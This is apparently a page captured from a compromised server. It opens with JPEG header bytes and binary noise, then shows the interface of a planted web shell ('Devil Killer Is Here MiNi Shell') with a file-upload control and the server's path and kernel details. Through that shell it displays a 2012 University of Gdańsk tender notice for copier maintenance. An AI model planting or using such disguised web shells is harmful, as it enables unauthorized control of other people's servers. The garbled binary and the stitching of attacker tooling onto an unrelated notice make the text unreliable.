JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120508/101625-N-2012.html

<p class="kh_header"><b>Gdańsk: Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących nieobjętych gwarancją, będących na  wyposażeniu Uniwersytetu  Gdańskiego wg części:
części I:  Canon, Selex, Sharp, Olivetti, Panasonic, Konica  Minolta, Develop, Brother,części II:  Ricoh, Nashuatec, Lanier, Rex  Rotary, Gestetner, Infotec, Xerox, Dsm, Samsung, Toshiba;części  III: Mita, Kyocera.</b><br>
<b>Numer ogłoszenia: 101625 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących nieobjętych gwarancją, będących na  wyposażeniu Uniwersytetu  Gdańskiego wg części:
części I:  Canon, Selex, Sharp, Olivetti, Panasonic, Konica  Minolta, Develop, Brother,części II:  Ricoh, Nashuatec, Lanier, Rex  Rotary, Gestetner, Infotec, Xerox, Dsm, Samsung, Toshiba;części  III: Mita, Kyocera..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na wykonywaniu przeglądów technicznych i bieżących napraw wielofunkcyjnych urządzeń drukująco - kopiujących, nieobjętych gwarancją, będących na wyposażeniu jednostek organizacyjnych Uniwersytetu Gdańskiego, zwanych  dalej usługą.
Zakres usługi obejmuje: przeglądy techniczne i naprawy wielofunkcyjnych urządzeń drukująco-kopiujących wraz  z  wymianą niesprawnych części zamiennych i  materiałów  eksploatacyjnych  ( z  wyłączeniem  papieru  i tonerów  nie  wchodzących w  zakres  niniejszego przedmiotu zamówienia )  , za cenę  zaoferowaną  przez Wykonawcę w formularzu ofertowym  - załącznik nr 1  do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium. Wykonawca przed upływem terminu składania ofert zobowiązany 
jest wnieść wadium w wysokości: 
1)	Część I-  2 430,00 zł. (słownie: dwa  tysiące  czterysta trzydzieści złotych  00/100).
2)	Część II-  3 600,00 zł. (słownie: trzy  tysiące sześćset złotych 00/100).
3)	Część III-  870,00 zł. (słownie: osiemset siedemdziesiąt złotych 00/100).
2.	W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Z 2007 r. Nr 42, poz.275 wraz z późniejszymi zmianami).
3.	Poręczenie, gwarancja, o których mowa w pkt. 2 powinny być ważne przez okres związania ofertą - kserokopia wadium powinna być dołączona do oferty, a oryginał dołączony do oferty w osobnej kopercie. Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania z ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy.
4.	Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
5.	Miejsce złożenia wadium.
        	Wadium wnoszone w formie pieniężnej należy wnieść przed terminem składania ofert przelewem na konto: 
BANK PEKAO S.A. IV/O Gdańsk Nr 54124012711111000014925434 z oznaczeniem: Postępowanie nr A120-211-36/12/MP - Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących, nieobjętych gwarancją,  będących na  wyposażeniu Uniwersytetu  Gdańskiego, część 
6.	Potwierdzeniem tej formy będzie kopia przelewu załączona do oferty. Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
7.	Ewentualne przesunięcie terminu składania ofert jest jednoznaczne z  przesunięciem terminu wniesienia wadium.
8.	Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania, a ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1)	Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana;
3)	Jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10.	Zwrot wadium.
1)	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
3)	Z zastrzeżeniem art. 46 ust. 4a ustawy, Zamawiający zwraca niezwłocznie wadium na pisemny wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który  został wykluczony z postępowania, 
c)	którego oferta została odrzucona.
11.	Jeżeli wadium wniesiono w pieniądzu Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
12.	W przypadku przedłużenia okresu związania ofertą, Wykonawca musi jednocześnie przedłużyć okres ważności wadium albo jeżeli nie jest to możliwe wnieść nowe wadium na przedłużony okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły  spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę, wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem usług zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie: 
a)	 część I - co najmniej jednej  usługi polegającej  na wykonywaniu  przeglądów  technicznych i bieżących  napraw wielofunkcyjnych urządzeń  drukująco-kopiujących- zakres odpowiednio do I części, o wartości nie mniejszej niż 70 000,00 zł. brutto,
b)	część II  - co najmniej jednej  usługi polegającej  na wykonywaniu  przeglądów  technicznych i bieżących  napraw wielofunkcyjnych urządzeń  drukująco-kopiujących - zakres odpowiednio do II  części, o wartości nie mniejszej niż 100 000,00 zł. brutto,
c)	część III - co najmniej jednej  usługi polegającej  na wykonywaniu  przeglądów  technicznych i bieżących  napraw wielofunkcyjnych urządzeń  drukująco-kopiujących - zakres odpowiednio do III części,  o wartości nie mniejszej niż 20 000,00 zł. brutto.

Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły  spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły  spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły  spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I  i  II :
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej związanej  z  przedmiotem zamówienia.

Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły  spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą: 
  1) 	oświadczenie o podwykonawcach, Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi nie dołącza do oferty załącznika nr 5 do SIWZ.
Oświadczenie składa jeden  z Wykonawców ubiegających się wspólnie o udzielenie zamówienia (w imieniu wszystkich członków konsorcjum oświadczenie o podwykonawcach  może złożyć pełnomocnik - z treści tego oświadczenia musi wyraźnie wynikać, że pełnomocnik składa je w imieniu  członka konsorcjum).
Inne dokumenty:
1)	zaakceptowany projekt umowy -załącznik nr 4 do SIWZ; Wykonawca może też zastosować się do informacji zawartej w rozdziale XVI pkt.1,
2)	potwierdzenie wpłaty  wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiany obowiązujących przepisów prawa,
2)	ustawowej zmiany stawki podatku VAT bez zmiany wynagrodzenia brutto Wykonawcy,
3)	zmiana dotycząca terminu realizacji umowy, jeżeli uzasadnione to będzie okolicznościami leżącymi po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub gdy zmiany te są  korzystne  dla  Zamawiającego,
4)	zmiana dotycząca w szczególności terminu realizacji zamówienia, gdzie zaistniała inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, 
za którą każda ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ,
5)	zaistnienia  siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Uniwersytetu Gdańskiego,
ul. Bażyńskiego 1A,  pokój nr 124, I piętro,
80 - 952 Gdańsk,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych Uniwersytetu Gdańskiego,
ul. Bażyńskiego 1A,  pokój nr 124, I piętro,
80 - 952 Gdańsk,
w godzinach pracy od 7:00 do 15:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wymaga,  przed podpisaniem umowy od wybranego Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % wartości brutto umowy wybranego Wykonawcy (  dla  każdej  części ) -  zgodnie  z informacją zawartą w Rozdziale  XI pkt. 6 SIWZ.
Zamawiający dopuszcza możliwość korzystania z usług podwykonawców - rozdział V pkt.3 ppkt.1).1.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. W przypadku, gdy oferta zawierać będzie propozycje rozwiązań alternatywnych lub wariantowych -zostanie odrzucona.
Zamawiający nie zamierza zawrzeć umowy ramowej jak i ustanowienia dynamicznego systemu zakupów.
Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z  zastosowaniem aukcji elektronicznej.
Zamawiający dopuszcza składanie ofert częściowych wg części I, II, III.
Zamawiający  nie dopuszcza możliwości składania ofert równoważnych. 
Zamawiający nie dopuszcza możliwości dokonania przedpłaty. 
Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają wyłącznie  Wykonawcę.
Rozliczenia dokonywane będą tylko w złotych polskich.
Zamawiający udostępnia SIWZ na stronie internetowej www.ug.edu.pl od dnia zamieszczenia publikacji w Biuletynie Zamówień Publicznych do upływu terminu  składania ofert.
SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy za stronę + koszty przesyłki -listem poleconym za zwrotnym potwierdzeniem odbioru) - art. 42 ust 2 ustawy. (Zamawiający zleci skopiowanie dokumentacji przetargowej).
Zamawiający w szczególnie uzasadnionych przypadkach może w każdym  czasie, przed upływem  terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym  przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu,  Zamawiający    zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień Publicznych.
Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  Zamawiający przedłuży termin składania ofert. 
O przedłużeniu terminu składania  ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej  Zamawiającego - art. 38 ust. 6 ustawy.
Zgodnie z zapisem art. 8 ustawy Pzp oraz regulacją ustawy o dostępie do informacji publicznej postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający może ograniczyć  dostęp do informacji związanych z postępowaniem tylko w przypadkach określonych  w ustawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących nieobjętych gwarancją, będących na  wyposażeniu Uniwersytetu  Gdańskiego wg części:
części I:  Canon, Selex, Sharp, Olivetti, Panasonic, Konica  Minolta, Develop, Brother,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na wykonywaniu przeglądów technicznych i bieżących napraw wielofunkcyjnych urządzeń drukująco - kopiujących, nieobjętych gwarancją, będących na wyposażeniu jednostek organizacyjnych Uniwersytetu Gdańskiego, zwanych  dalej usługą.
